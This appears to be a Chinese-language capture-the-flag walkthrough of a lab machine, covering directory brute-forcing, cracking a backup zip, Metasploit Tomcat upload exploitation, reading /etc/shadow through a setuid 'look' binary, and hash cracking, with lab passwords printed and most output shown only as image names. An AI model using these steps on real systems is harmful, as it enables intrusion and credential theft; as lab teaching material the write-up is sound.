描述

Difficulty: Medium

Hint: Enumeration is key.


存活

image-20221204095932968

1
2
kali  192.168.169.220
靶机 192.168.169.230

靶机

image-20221204100203706

1
端口 22 80 8080

80

image-20221204100349216

8080

image-20221204100408871

目录爆破

1
gobuster dir -u http://192.168.169.230/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

image-20221204101143874

1
http://192.168.169.230/   80端口的没跑出来
  • 试一下8080
1
gobuster dir -u http://192.168.169.230:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

image-20221204101455728

1
两个文件

readme

image-20221204101537044

1
2
3
4
5
Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it.
Also remember to use that password I gave you.

嘿,Randy! 我是你的系统管理员。我在服务器上给你留了一个文件,我相信没有人会发现它。
另外,记得使用我给你的密码。

backup

  • 上面提示的应该是这个文件

image-20221204101808596

  • 爆破压缩包
1
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

image-20221204101903261

image-20221204101958349

  • tomcat-users

image-20221204102118957

1
2
manager /melehifokivai
admin /melehifokivai
1
2
这两都是可以登陆的,那账号密码没问题,找到了上传的地方,但试了下没啥反应.
msf 有个 Tomcat 上传webshell的模块,有用户名和密码就可以使用:

漏洞利用

  • msf
1
msfconsole
  • 搜索漏洞
1
search tomcat upload

image-20221204102925524

  • 使用
1
use 3

image-20221204103327056

  • 设置

image-20221204103925820

  • 检查一下

image-20221204104024108

1
个人失误 : 靶机IP 192.168.169.230
  • 开始攻击
1
run

image-20221204104411014

image-20221204104440949

查看文件

image-20221204105031236

  • 因为 randy 下的文件不能修改,一些关键文件也无法查看,而/home/jaye 文件夹里的文件没有权限查看:

  • 尝试一下切换成 jaye 用户,密码还是用刚才发现的 Tomcat 密码:

image-20221204105154606

image-20221204105440309

image-20221204105531352

  • 可以ssh

    image-20221204105917001

1
这里再jaye的目录下发现了look文件,查看一番后,发现他是系统的文件,这里可以进行越权访问,然后cat命令这里是用不了的,看了大佬们的提示,这里需要用到LFILE,该命令等同于file_to_read。读取一下shadow和passwd的文件内容
1
2
3
LFILE=/etc/shadow

./look '' "$LFILE"

image-20221204110502985

  • 读取passwd和shadow的文件

image-20221204111307215

1
passwd下载
  • 再使用unshadow命令将这两个文件生成需要破解的文件。
1
unshadow passwd shadow > password.txt

image-20221204112120117

  • 破解 -看帖子说要好久

image-20221204112249003

1
2
3
4
借用大佬的

melehifokivai (jaye)
07051986randy (randy)
  • ssh连接

image-20221204112919854

提权

image-20221204112600686

  • 跟着大佬操作

image-20221204113338797

image-20221204113606139

image-20221204115906333

image-20221204115636047